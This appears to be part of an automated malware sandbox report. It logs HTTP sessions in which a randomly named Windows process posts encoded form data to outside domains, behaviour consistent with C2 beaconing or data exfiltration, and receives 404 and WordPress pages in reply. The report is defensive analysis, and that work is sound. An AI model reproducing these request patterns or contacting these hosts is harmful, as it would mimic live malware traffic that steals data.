                                  Sep 16, 2024 09:31:59.436384916 CEST | 223 | IN | Data Raw: 63 6f 6e 74 61 69 6e 65 72 22 3e 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 77 69 64 74 68 3d 22 37 30 30 70 78 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 7a 6f 68 6f 2e 63 6f 6d 2f 73 69 74 65
                                  Data Ascii: container"> <img width="700px" src="https://www.zoho.com/sites/images/professionally-crafted-themes.png" style="margin-top: 15px"> </div> </div> </div> </body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  25 | 192.168.2.4 | 55834 | 199.192.21.169 | 80 | 5964 | C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Sep 16, 2024 09:32:04.916574955 CEST | 768 | OUT | POST /85su/ HTTP/1.1
                                  Host: www.selftip.top
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.selftip.top
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 202
                                  Referer: http://www.selftip.top/85su/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 7a 31 70 61 63 58 76 33 7a 71 55 44 6a 4c 39 45 77 69 6c 58 6f 52 6b 48 46 61 4a 2b 56 76 73 6b 31 79 70 46 5a 55 4d 44 64 50 39 50 4f 6c 38 76 77 4c 41 4b 67 73 36 6c 53 51 6c 6c 63 68 6d 2b 2f 41 70 4b 50 42 63 41 73 79 70 2b 70 66 4c 55 6b 74 6d 77 45 76 6a 78 47 6c 47 6c 59 39 31 4b 2f 62 48 55 70 59 6c 6a 46 6d 75 75 6b 31 43 53 72 74 30 66 33 37 71 39 6d 57 77 74 57 6f 68 54 7a 47 6b 68 4b 54 61 33 74 54 4c 71 58 62 61 33 2f 7a 4e 4a 48 73 77 32 57 42 52 55 6a 39 6d 7a 6a 35 72 44 64 71 7a 44 52 34 50 38 66 79 57 43 6b 2f 6f 62 32 4f 4b 35 58 4f 44 35 77 5a 55 38 6f 77 3d 3d
                                  Data Ascii: h2Pt9=z1pacXv3zqUDjL9EwilXoRkHFaJ+Vvsk1ypFZUMDdP9POl8vwLAKgs6lSQllchm+/ApKPBcAsyp+pfLUktmwEvjxGlGlY91K/bHUpYljFmuuk1CSrt0f37q9mWwtWohTzGkhKTa3tTLqXba3/zNJHsw2WBRUj9mzj5rDdqzDR4P8fyWCk/ob2OK5XOD5wZU8ow==
                                  Sep 16, 2024 09:32:05.500449896 CEST | 918 | IN | HTTP/1.1 404 Not Found
                                  Date: Mon, 16 Sep 2024 07:32:05 GMT
                                  Server: Apache
                                  Content-Length: 774
                                  Connection: close
                                  Content-Type: text/html
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  26 | 192.168.2.4 | 55835 | 199.192.21.169 | 80 | 5964 | C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Sep 16, 2024 09:32:07.473736048 CEST | 788 | OUT | POST /85su/ HTTP/1.1
                                  Host: www.selftip.top
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.selftip.top
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 222
                                  Referer: http://www.selftip.top/85su/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 7a 31 70 61 63 58 76 33 7a 71 55 44 69 71 4e 45 32 7a 6c 58 6b 68 6b 45 4c 36 4a 2b 65 50 73 67 31 79 6c 46 5a 56 35 49 64 39 70 50 50 45 4d 76 69 36 41 4b 7a 63 36 6c 59 77 6c 67 44 78 6e 79 2f 41 56 43 50 42 51 41 73 7a 4e 2b 70 64 44 55 6c 65 65 78 43 76 6a 7a 4f 46 47 72 46 4e 31 4b 2f 62 48 55 70 59 78 4a 46 6e 47 75 6a 46 79 53 72 4a 6f 41 37 62 72 50 6a 6d 77 74 53 6f 67 61 7a 47 6b 50 4b 57 37 71 74 51 6a 71 58 65 6d 33 2f 69 4e 49 49 73 77 38 49 78 51 47 74 63 53 32 71 4c 75 41 55 4e 62 45 50 34 66 75 65 30 48 59 31 4f 4a 4d 6b 4f 75 4b 4b 4a 4b 4e 39 61 70 31 7a 39 32 48 37 55 73 61 55 6a 58 4f 7a 74 30 32 66 6e 69 54 42 6f 49 3d
                                  Data Ascii: h2Pt9=z1pacXv3zqUDiqNE2zlXkhkEL6J+ePsg1ylFZV5Id9pPPEMvi6AKzc6lYwlgDxny/AVCPBQAszN+pdDUleexCvjzOFGrFN1K/bHUpYxJFnGujFySrJoA7brPjmwtSogazGkPKW7qtQjqXem3/iNIIsw8IxQGtcS2qLuAUNbEP4fue0HY1OJMkOuKKJKN9ap1z92H7UsaUjXOzt02fniTBoI=
                                  Sep 16, 2024 09:32:08.056215048 CEST | 918 | IN | HTTP/1.1 404 Not Found
                                  Date: Mon, 16 Sep 2024 07:32:07 GMT
                                  Server: Apache
                                  Content-Length: 774
                                  Connection: close
                                  Content-Type: text/html
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  27 | 192.168.2.4 | 55836 | 199.192.21.169 | 80 | 5964 | C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Sep 16, 2024 09:32:10.014894009 CEST | 7416 | OUT | POST /85su/ HTTP/1.1
                                  Host: www.selftip.top
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.selftip.top
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 10302
                                  Referer: http://www.selftip.top/85su/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 7a 31 70 61 63 58 76 33 7a 71 55 44 69 71 4e 45 32 7a 6c 58 6b 68 6b 45 4c 36 4a 2b 65 50 73 67 31 79 6c 46 5a 56 35 49 64 39 78 50 50 33 45 76 7a 70 59 4b 77 63 36 6c 47 67 6c 68 44 78 6e 37 2f 41 4e 47 50 42 4d 50 73 78 46 2b 6d 65 62 55 69 76 65 78 52 50 6a 7a 4d 46 47 71 59 39 31 6c 2f 62 33 59 70 59 68 4a 46 6e 47 75 6a 48 71 53 37 4e 30 41 35 62 71 39 6d 57 77 68 57 6f 68 7a 7a 47 39 79 4b 57 2b 64 74 68 44 71 58 2b 57 33 39 51 6c 49 42 73 77 79 4a 78 52 44 74 63 50 6d 71 4c 79 71 55 49 6e 69 50 36 44 75 64 41 75 45 67 4f 38 62 6e 75 2b 31 4a 6f 6e 72 7a 5a 46 72 33 4e 54 35 39 30 41 5a 4c 51 6a 42 35 66 77 37 44 33 53 4e 64 38 58 46 6a 6e 61 5a 77 61 76 4b 36 70 52 4c 48 45 52 69 6e 39 4b 31 57 74 70 79 4c 6c 39 63 4d 4b 76 77 2b 65 6c 53 47 62 2b 4c 52 74 4a 67 4f 52 54 51 64 65 51 4d 50 58 37 4c 79 42 33 54 30 51 66 65 6b 33 76 67 46 54 4e 6f 68 33 7a 36 58 53 56 49 75 53 62 66 4d 44 2b 51 34 76 44 61 79 52 6b 65 49 6a 43 6e 53 49 45 38 34 58 6a 79 32 68 32 6d 59 4a 66 50 [TRUNCATED]
                                  Data Ascii: h2Pt9=z1pacXv3zqUDiqNE2zlXkhkEL6J+ePsg1ylFZV5Id9xPP3EvzpYKwc6lGglhDxn7/ANGPBMPsxF+mebUivexRPjzMFGqY91l/b3YpYhJFnGujHqS7N0A5bq9mWwhWohzzG9yKW+dthDqX+W39QlIBswyJxRDtcPmqLyqUIniP6DudAuEgO8bnu+1JonrzZFr3NT590AZLQjB5fw7D3SNd8XFjnaZwavK6pRLHERin9K1WtpyLl9cMKvw+elSGb+LRtJgORTQdeQMPX7LyB3T0Qfek3vgFTNoh3z6XSVIuSbfMD+Q4vDayRkeIjCnSIE84Xjy2h2mYJfP+wjg3qz+itTmmLs87u83PSwROFL/X1CQ/z2+cogCM4EuY/NYWkPEuGHYlPCxnRDNCMYAQRb49cI16lbjj1aun+cKmggMC0zN+WSAQvXKIqKzGKEoJvWNLyceHcxnQHO148A6h3u444gVZw1075CdyxNFfz+4hJSOwDd/gKt4yf/ANfqmIdVbmamf3iC6iRUNK+Tm6V+/T7Ec8nWGHHNNlJZEw8LByU5DYgM7OswVIJH8V6X+D8gSC4VrGnMKT0Kvl18muOlZp7uUkLiGNh7C4FcUHwXNmaD83GQa3XJ7jnFNuXgRQ6EahbrFPN/qhlZvOqiTXQaH2YdSE6fYEC7Fe7Eb53vPLvoZagXNTsf+H5kguh5771cb/n/DsekqL/K8Y2gQRuhqP6zyy0k0dwijAy0ZRI4u6ziQGT6APwOL0KCEhT5CrPSj0OFr+i0eAaRXTn0oBXgQBnTuX7OeAQ6pYTeU7UME3xTsgtBpnNBEUVoTUxffu5VzibKhhcN5Zwf0HkBz4Lw+GBHn22nI1gIbRugGJGLLMeCNW4XznxOablhPoOy2AXJx50ECQOi5lshIaSjBlt0RYVgSqsPAfKSZ3J6tm2VrqSeKSvYGmxdWxitT3GVEdEZiJSb48EI9HQ8nlIySNZ+cG3U281Nwt6aq0DaxAh3nNXBZs6 [TRUNCATED]
                                  Sep 16, 2024 09:32:10.014921904 CEST | 3454 | OUT | Data Raw: 71 77 37 6a 67 70 44 32 69 62 45 4f 52 7a 43 58 6d 39 30 44 31 6e 36 41 53 6d 4d 31 33 6b 6f 41 74 5a 2f 74 6d 75 30 43 6c 6d 74 68 70 74 46 30 37 50 55 4d 38 6a 6e 67 42 52 7a 31 4b 51 72 4a 4f 37 78 52 47 5a 5a 64 51 6f 50 65 41 4c 36 5a 66 55
                                  Data Ascii: qw7jgpD2ibEORzCXm90D1n6ASmM13koAtZ/tmu0ClmthptF07PUM8jngBRz1KQrJO7xRGZZdQoPeAL6ZfUJAKFGMx8GsCrH2+5uJMFnf3TkagbUXYUUCuSHpi6aRJ4M7EYNSqwetjEuZ7q+MFAr8jywzZc2uRLVKVi6FEekUjQ7AkoPhSeo72ShbTDFA53MnWOULyR2uu8UtMCquDWaPRh2bUVHtp2LWMs0fpOOUeuaYdoFF2Dw
                                  Sep 16, 2024 09:32:10.689867973 CEST | 918 | IN | HTTP/1.1 404 Not Found
                                  Date: Mon, 16 Sep 2024 07:32:10 GMT
                                  Server: Apache
                                  Content-Length: 774
                                  Connection: close
                                  Content-Type: text/html
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  28 | 192.168.2.4 | 55837 | 199.192.21.169 | 80 | 5964 | C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Sep 16, 2024 09:32:12.556477070 CEST | 509 | OUT | GET /85su/?h2Pt9=+3B6fjGs9Z40sbhWxh4Olw8ODpxTfKIF4isjbFYKdetJPWg+iKgIwujGEU5yKjzj4BkeFS8xvi4EjdbOtsLgFdPJH1ajNMdDlKenjZRhD3fwrVi0trMy8bo=&4RLhs=7BJLM4eH HTTP/1.1
                                  Host: www.selftip.top
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Connection: close
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Sep 16, 2024 09:32:13.167406082 CEST | 933 | IN | HTTP/1.1 404 Not Found
                                  Date: Mon, 16 Sep 2024 07:32:13 GMT
                                  Server: Apache
                                  Content-Length: 774
                                  Connection: close
                                  Content-Type: text/html; charset=utf-8
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  29 | 192.168.2.4 | 55838 | 44.213.25.70 | 80 | 5964 | C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Sep 16, 2024 09:32:18.237884998 CEST | 786 | OUT | POST /72tr/ HTTP/1.1
                                  Host: www.newdaydawning.net
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.newdaydawning.net
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 202
                                  Referer: http://www.newdaydawning.net/72tr/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 64 62 2b 2b 59 56 64 65 46 36 5a 64 2f 50 49 64 30 52 55 7a 48 7a 53 50 44 4c 79 62 6e 69 2b 46 42 39 5a 47 78 7a 63 71 66 37 49 79 75 6b 6f 72 4f 7a 47 77 61 63 6d 33 36 64 56 45 53 74 58 45 65 70 2b 64 41 46 6b 76 5a 45 34 2b 58 41 56 6e 30 38 47 4a 45 70 64 72 64 77 4e 68 54 65 42 2b 58 72 31 41 37 6b 38 65 71 6c 43 6a 70 65 6f 35 59 44 4b 55 6e 72 44 70 55 31 55 6c 6c 7a 6e 36 2b 57 6f 7a 39 71 4c 6e 53 64 69 46 52 57 66 33 4f 6b 69 38 35 4c 33 35 6b 55 32 32 7a 31 7a 4d 50 58 4a 52 4d 56 43 30 41 4a 36 4b 53 4b 6b 4a 62 71 2f 6c 32 68 46 71 4c 47 75 5a 39 65 44 4b 7a 77 3d 3d
                                  Data Ascii: h2Pt9=db++YVdeF6Zd/PId0RUzHzSPDLybni+FB9ZGxzcqf7IyukorOzGwacm36dVEStXEep+dAFkvZE4+XAVn08GJEpdrdwNhTeB+Xr1A7k8eqlCjpeo5YDKUnrDpU1Ullzn6+Woz9qLnSdiFRWf3Oki85L35kU22z1zMPXJRMVC0AJ6KSKkJbq/l2hFqLGuZ9eDKzw==
                                  Sep 16, 2024 09:32:19.472023964 CEST | 489 | IN | HTTP/1.1 404 Not Found
                                  Date: Mon, 16 Sep 2024 07:32:18 GMT
                                  Server: Apache
                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                  Link: <https://newdaydawning.net/wp-json/>; rel="https://api.w.org/"
                                  Connection: close
                                  Transfer-Encoding: chunked
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 31 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 0d 0a 37 65 0d 0a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a
                                  Data Ascii: 16<!doctype html><html 7elang="en-US" prefix="og: https://ogp.me/ns#" ><head><link rel="profile" href="https://gmpg.org/xfn/11"><meta charset="
                                  Sep 16, 2024 09:32:19.472552061 CEST | 1236 | IN | Data Raw: 35 32 0d 0a 55 54 46 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e
                                  Data Ascii: 52UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1">9cc<script type="text/javascript">window.flatStyles = window.flatStyles || ''window.lightspeedOptimizeStylesheet = function () {const cur
                                  Sep 16, 2024 09:32:19.472603083 CEST | 224 | IN | Data Raw: 73 68 65 65 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 20 27 64 61 74 61 2d 6c 73 2d 6f 70 74 69 6d 69 7a 65 64 27 2c 20 27 31 27 20 29 0a 0a 09 09 09 09 09 09 09 09 09 77 69 6e 64 6f 77 2e 66 6c 61 74 53 74 79 6c 65 73 20 2b 3d 20 63 75 72 72
                                  Data Ascii: sheet.setAttribute( 'data-ls-optimized', '1' )window.flatStyles += currentStylesheet.innerHTMLthis.optimizing = false}} else {window.flatStyles = currentStylesheet.innerHTML
                                  Sep 16, 2024 09:32:19.472640038 CEST | 1143 | IN | Data Raw: 09 09 09 09 09 09 63 75 72 72 65 6e 74 53 74 79 6c 65 73 68 65 65 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 20 27 64 61 74 61 2d 6c 73 2d 6f 70 74 69 6d 69 7a 65 64 27 2c 20 27 31 27 20 29 0a 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 7d 0a
                                  Data Ascii: currentStylesheet.setAttribute( 'data-ls-optimized', '1' )}}} catch ( error ) {console.warn( error )}if ( currentStylesheet.parentElement.tagName !== 'HEAD' ) {/* always make sure that thos
                                  Sep 16, 2024 09:32:19.493143082 CEST | 1236 | IN | Data Raw: 31 66 34 30 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 69 64 3d 22 74 63 62 2d 73 74 79 6c 65 2d 62 61 73 65 2d 74 68 72 69 76 65 5f 74 65 6d 70 6c 61 74 65 2d 32 31 39 22 20 20 6f 6e 4c 6f 61 64 3d 22 74 79 70 65
                                  Data Ascii: 1f40<style type="text/css" id="tcb-style-base-thrive_template-219" onLoad="typeof window.lightspeedOptimizeStylesheet === 'function' && window.lightspeedOptimizeStylesheet()" class="tcb-lightspeed-style">.thrv_widget_menu{position:relative;
                                  Sep 16, 2024 09:32:19.493176937 CEST | 224 | IN | Data Raw: 2d 69 74 65 6d 2d 64 72 6f 70 64 6f 77 6e 2d 74 72 69 67 67 65 72 3a 6e 6f 74 28 3a 65 6d 70 74 79 29 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 3b 7d 2e 74 76 65 2d 6d 2d 74 72 69 67 67 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 2d 77
                                  Data Ascii: -item-dropdown-trigger:not(:empty){margin-left:8px;}.tve-m-trigger{display:none;-webkit-tap-highlight-color:transparent;}.tve-m-trigger:focus,.tve-m-trigger:active{outline:none;}.tve-m-trigger .thrv_icon{font-size:33px;width
                                  Sep 16, 2024 09:32:19.493211031 CEST | 1236 | IN | Data Raw: 3a 33 33 70 78 3b 68 65 69 67 68 74 3a 33 33 70 78 3b 6d 61 72 67 69 6e 3a 30 70 78 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 3a 30 2e 33 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 74 76 65 2d 6d 2d 74 72 69 67
